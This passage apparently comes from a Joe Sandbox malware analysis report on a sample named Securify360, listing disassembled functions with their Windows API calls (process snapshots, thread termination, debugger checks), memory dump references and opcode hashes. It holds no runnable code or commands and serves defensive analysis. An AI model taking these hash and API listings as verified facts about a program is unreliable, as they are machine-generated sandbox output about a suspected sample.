                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1986988660-0
                                                                                              • Opcode ID: 671b57950f1c93232ea69c3f082bea80936b5b7bfe9e94a21f70921af02fd73c
                                                                                              • Instruction ID: 7f55cdd83537e5518fe36ee7fa2060b3456a23fdcc847d6761afdfdeb9e0e325
                                                                                              • Opcode Fuzzy Hash: 671b57950f1c93232ea69c3f082bea80936b5b7bfe9e94a21f70921af02fd73c
                                                                                              • Instruction Fuzzy Hash: B881CAB09013448FC3A8EF69E8456277FE9FB493147D0856AE8D8C725AEB3A4805FF51
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FA59F9
                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA5A9E
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA5ABB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1505330794-0
                                                                                              • Opcode ID: 1c03bf4ea3c8474b3783fca0f91b817a91e6432131acb0c85fe90f932ba8ada9
                                                                                              • Instruction ID: 4470b19ec7c553b0cd5fde2e12a33ad6e2475d5a57f69c0358d8656dff68fea6
                                                                                              • Opcode Fuzzy Hash: 1c03bf4ea3c8474b3783fca0f91b817a91e6432131acb0c85fe90f932ba8ada9
                                                                                              • Instruction Fuzzy Hash: 023191B0A057019FC731DF24D88469BBBF8FB49718F400A2EF5DA87240E779A944EB52
                                                                                              APIs
                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00FB5953
                                                                                                • Part of subcall function 00FBA39B: __NMSG_WRITE.LIBCMT ref: 00FBA3C2
                                                                                                • Part of subcall function 00FBA39B: __NMSG_WRITE.LIBCMT ref: 00FBA3CC
                                                                                              • __NMSG_WRITE.LIBCMT ref: 00FB595A
                                                                                                • Part of subcall function 00FBA3F8: GetModuleFileNameW.KERNEL32(00000000,010553BA,00000104,?,00000001,00FB1003), ref: 00FBA48A
                                                                                                • Part of subcall function 00FBA3F8: ___crtMessageBoxW.LIBCMT ref: 00FBA538
                                                                                                • Part of subcall function 00FB32CF: ___crtCorExitProcess.LIBCMT ref: 00FB32D5
                                                                                                • Part of subcall function 00FB32CF: ExitProcess.KERNEL32 ref: 00FB32DE
                                                                                                • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                                                              • RtlAllocateHeap.NTDLL(01490000,00000000,00000001,?,?,?,?,00FB1003,?,0000FFFF), ref: 00FB597F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                              • String ID:
                                                                                              • API String ID: 1372826849-0
                                                                                              • Opcode ID: db9b36bfad3d721a8d6630223797f136d2e96a970b23c4c342caaf39120e2113
                                                                                              • Instruction ID: 8fcd2f1da3bd802fcc5392183a178de40b47aee87b2889e86185bd4db6baa7db
                                                                                              • Opcode Fuzzy Hash: db9b36bfad3d721a8d6630223797f136d2e96a970b23c4c342caaf39120e2113
                                                                                              • Instruction Fuzzy Hash: 7C01F536741B06DAE7252B779C02BEE32588F82BB0F500027F9159A1D1DE7D8D01AF61
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00FF92D6
                                                                                                • Part of subcall function 00FB2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3,?), ref: 00FB2F99
                                                                                                • Part of subcall function 00FB2F85: GetLastError.KERNEL32(00000000,?,00FB9C54,00000000,00FB8D5D,00FB59C3,?), ref: 00FB2FAB
                                                                                              • _free.LIBCMT ref: 00FF92E7
                                                                                              • _free.LIBCMT ref: 00FF92F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                              • Instruction ID: a0deed25b1e9a465ad7f734ad8fb0888cd5055b616321224d44547760868a44e
                                                                                              • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                              • Instruction Fuzzy Hash: 98E0C2A1B0860293CA20A53A6C40FF377EC0F88321714040EB509DB142EE68E841B438
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00FF7016,00000000,?,00FF710A,00000000,00000000,00FD2F49), ref: 00FF7237
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00FF7016,00000000,?,00FF710A,00000000,00000000,00FD2F49), ref: 00FF723F
                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,00FF7016,00000000,?,00FF710A,00000000,00000000,00FD2F49), ref: 00FF7246
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess$DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 1294930198-0
                                                                                              • Opcode ID: 1318b8c311e095b9f0cd0c6d59aa061af49c0162641859e625be51ace9934430
                                                                                              • Instruction ID: 9857db6e267f9e82902266df68256e487184b3b47031fec357e89104deff0356
                                                                                              • Opcode Fuzzy Hash: 1318b8c311e095b9f0cd0c6d59aa061af49c0162641859e625be51ace9934430
                                                                                              • Instruction Fuzzy Hash: 3AD0C236000304BBC7212E95EC09F367B2CDBC2B22F304016F204851089A7684005B20
                                                                                              APIs
                                                                                                • Part of subcall function 00FF77EB: InterlockedExchange.KERNEL32(?,?), ref: 00FF77FE
                                                                                                • Part of subcall function 00FF77EB: EnterCriticalSection.KERNEL32(?,?,00F9C2B6,?,?), ref: 00FF780F
                                                                                                • Part of subcall function 00FF77EB: TerminateThread.KERNEL32(00000000,000001F6,?,00F9C2B6,?,?), ref: 00FF781C
                                                                                                • Part of subcall function 00FF77EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F9C2B6,?,?), ref: 00FF7829
                                                                                                • Part of subcall function 00FF77EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF783C
                                                                                                • Part of subcall function 00FF77EB: LeaveCriticalSection.KERNEL32(?,?,00F9C2B6,?,?), ref: 00FF7843
                                                                                              • CloseHandle.KERNELBASE(?,?,00FF70DF), ref: 00FF708A
                                                                                              • CloseHandle.KERNEL32(?,?,00FF70DF), ref: 00FF7093
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,00FF70DF), ref: 00FF70A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2929296749-0
                                                                                              • Opcode ID: d74ee363e24dbf32f483e35832948578ae13195ea591a3d563e79c03d7bbceb9
                                                                                              • Instruction ID: 03c600b2b3b419240cbd767a81fd8915737d6a3079ccaaff8312b2407853f89e
                                                                                              • Opcode Fuzzy Hash: d74ee363e24dbf32f483e35832948578ae13195ea591a3d563e79c03d7bbceb9
                                                                                              • Instruction Fuzzy Hash: 92E0E233000746ABC7652FA4FC4888AFF7DBF887113A44122F14586978CB3AA4A0DF60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CALL
                                                                                              • API String ID: 0-4196123274
                                                                                              • Opcode ID: 65365f431927f2409b31cb24e89a3e2036a3635dc451b31f36b3194f586330fe
                                                                                              • Instruction ID: eacb41fb1427da5a1e92a9b94a55ed69066ab3a9cf9c28ee4a1a442929e7d189
                                                                                              • Opcode Fuzzy Hash: 65365f431927f2409b31cb24e89a3e2036a3635dc451b31f36b3194f586330fe
                                                                                              • Instruction Fuzzy Hash: 82326A71908301CFEB24DF14C591B6ABBE1BF84714F15856DE88A8B362D735EC85EB82
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 4104443479-3962188686
                                                                                              • Opcode ID: 6695aca6700c9dc95fbf8f2c35d686093cfceb21d1ab30c3d37a8850ff696af8
                                                                                              • Instruction ID: 9bca05a1c8567e463c27fb8eaf3467d72f2c236f9d52aaf42dd072d565c72e67
                                                                                              • Opcode Fuzzy Hash: 6695aca6700c9dc95fbf8f2c35d686093cfceb21d1ab30c3d37a8850ff696af8
                                                                                              • Instruction Fuzzy Hash: 7A419EB2E041985BDF219B548C517BF7BA58BCB310F184075F882E7286D6A4AE94B3E1
                                                                                              APIs
                                                                                              • _strcat.LIBCMT ref: 0100E20C
                                                                                                • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                                                                • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                                                              • _wcscpy.LIBCMT ref: 0100E29B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1012013722-0
                                                                                              • Opcode ID: 42b52666c9c9323a4e1ca9168e60ea88729f414cc9b298443ba663a99cbc4dfd
                                                                                              • Instruction ID: cda0270570066184bfa93f7de7950f4e341d1ad1e985d5653d8581b7f38efbbd
                                                                                              • Opcode Fuzzy Hash: 42b52666c9c9323a4e1ca9168e60ea88729f414cc9b298443ba663a99cbc4dfd
                                                                                              • Instruction Fuzzy Hash: 69914A34A00505DFEB19DF18C9859ADBBE5FF49310B45C49AE84A9F3A2DB34F901CB81
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE ref: 00FB0ED5
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00FB0EE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 3280610774-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: 3f18400c2e2d08cf6b33990dad131cd25d004b5b57c46f42e5148831acf50e81
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: 4E31EA71A00109DFD718DF19C480AAAF7A5FF49310B648A95E409CF265DB31EDC1DF80
                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 00FA5FEF
                                                                                                • Part of subcall function 00FB359C: __lock.LIBCMT ref: 00FB35A2
                                                                                                • Part of subcall function 00FB359C: DecodePointer.KERNEL32(00000001,?,00FA6004,00FE8892), ref: 00FB35AE
                                                                                                • Part of subcall function 00FB359C: EncodePointer.KERNEL32(?,?,00FA6004,00FE8892), ref: 00FB35B9
                                                                                                • Part of subcall function 00FA5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FA5F18
                                                                                                • Part of subcall function 00FA5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA5F2D
                                                                                                • Part of subcall function 00FA5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA526C
                                                                                                • Part of subcall function 00FA5240: IsDebuggerPresent.KERNEL32 ref: 00FA527E
                                                                                                • Part of subcall function 00FA5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FA52E6
                                                                                                • Part of subcall function 00FA5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00FA5366
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00FA602F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                              • String ID:
                                                                                              • API String ID: 1438897964-0
                                                                                              • Opcode ID: 360a1ba7e5a5a26dba628e53a160eb0eb785b489c94326eeba6ead0e9ca6597d
                                                                                              • Instruction ID: d3e14589a030bb691e623c0255879b8f264cf19e7b25e1f633befcbe4e6bfc6c
                                                                                              • Opcode Fuzzy Hash: 360a1ba7e5a5a26dba628e53a160eb0eb785b489c94326eeba6ead0e9ca6597d
                                                                                              • Instruction Fuzzy Hash: 1611CD718083019BC720EF69E80594BBFE8FF98750F00851FF485832A5DB799545EF92
                                                                                              APIs
                                                                                                • Part of subcall function 00FB593C: __FF_MSGBANNER.LIBCMT ref: 00FB5953
                                                                                                • Part of subcall function 00FB593C: __NMSG_WRITE.LIBCMT ref: 00FB595A
                                                                                                • Part of subcall function 00FB593C: RtlAllocateHeap.NTDLL(01490000,00000000,00000001,?,?,?,?,00FB1003,?,0000FFFF), ref: 00FB597F
                                                                                              • std::exception::exception.LIBCMT ref: 00FB101C
                                                                                              • __CxxThrowException@8.LIBCMT ref: 00FB1031
                                                                                                • Part of subcall function 00FB87CB: RaiseException.KERNEL32(?,?,0000FFFF,0104CAF8,?,?,?,?,?,00FB1036,0000FFFF,0104CAF8,?,00000001), ref: 00FB8820
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 3902256705-0
                                                                                              • Opcode ID: e0724aa3542d4ecd267f8e0fac85768ea44349def1570af06532332184f21f37
                                                                                              • Instruction ID: 4015c1f63a56f28ac0eb85997b8c3b672976f0562458c5d2ae881dccb4c58773
                                                                                              • Opcode Fuzzy Hash: e0724aa3542d4ecd267f8e0fac85768ea44349def1570af06532332184f21f37
                                                                                              • Instruction Fuzzy Hash: 1EF02D3160421DA2C724BB5AFC169DE779CAF01390F500015F81496581DF748A81EED0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock_file_memset
                                                                                              • String ID:
                                                                                              • API String ID: 26237723-0
                                                                                              • Opcode ID: 90bbc45ef03d58997e7f6bc2d33110442d14ab168656c2c1dd8b70b1ac0e036d
                                                                                              • Instruction ID: e8cca3193b7936f6a9c3d15b67d0a2091039cd862d671b79d0601be78825a79c
                                                                                              • Opcode Fuzzy Hash: 90bbc45ef03d58997e7f6bc2d33110442d14ab168656c2c1dd8b70b1ac0e036d
                                                                                              • Instruction Fuzzy Hash: 98012171C01649EBCF11AFABDC02ADE7B65AF80760F148115B8285A161D73DCA12FF91
                                                                                              APIs
                                                                                                • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                                                              • __lock_file.LIBCMT ref: 00FB560B
                                                                                                • Part of subcall function 00FB6E3E: __lock.LIBCMT ref: 00FB6E61
                                                                                              • __fclose_nolock.LIBCMT ref: 00FB5616
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2800547568-0
                                                                                              • Opcode ID: a3a200876b46ca00185bf623ecb208ad58e90a02785722ce3de60524357bacd9
                                                                                              • Instruction ID: d79afe0bfb8ea784f48c9b16afbd67ababe8b01ae14e4ff2bafd770297f08f97
                                                                                              • Opcode Fuzzy Hash: a3a200876b46ca00185bf623ecb208ad58e90a02785722ce3de60524357bacd9
                                                                                              • Instruction Fuzzy Hash: 35F09071901B059AD7216B7B8C02BEE77A66F80776F198209A424AB1C1CF7C8942FF55
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,00FF710A,00000000,00000000,00FD2F49), ref: 00FF6FFF
                                                                                              • InterlockedExchange.KERNEL32(00000034,00000000), ref: 00FF7021
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                              • String ID:
                                                                                              • API String ID: 4104817828-0
                                                                                              • Opcode ID: 4bea8bb3a91ae5da4b0d52c8969578eb648200c38bfcc6dc6c4a53903afec4d4
                                                                                              • Instruction ID: 72a678d408c8a8788ca30df9756f25f3129d80017c9cc314e8f5dd00c9a9d1b0
                                                                                              • Opcode Fuzzy Hash: 4bea8bb3a91ae5da4b0d52c8969578eb648200c38bfcc6dc6c4a53903afec4d4
                                                                                              • Instruction Fuzzy Hash: 70F0D4B11007059FD3209F56E9449A7FBECFF85710B40882EE58A87A54D7B9A445CF61
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 00FB5EB4
                                                                                              • __ftell_nolock.LIBCMT ref: 00FB5EBF
                                                                                                • Part of subcall function 00FB8D58: __getptd_noexit.LIBCMT ref: 00FB8D58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
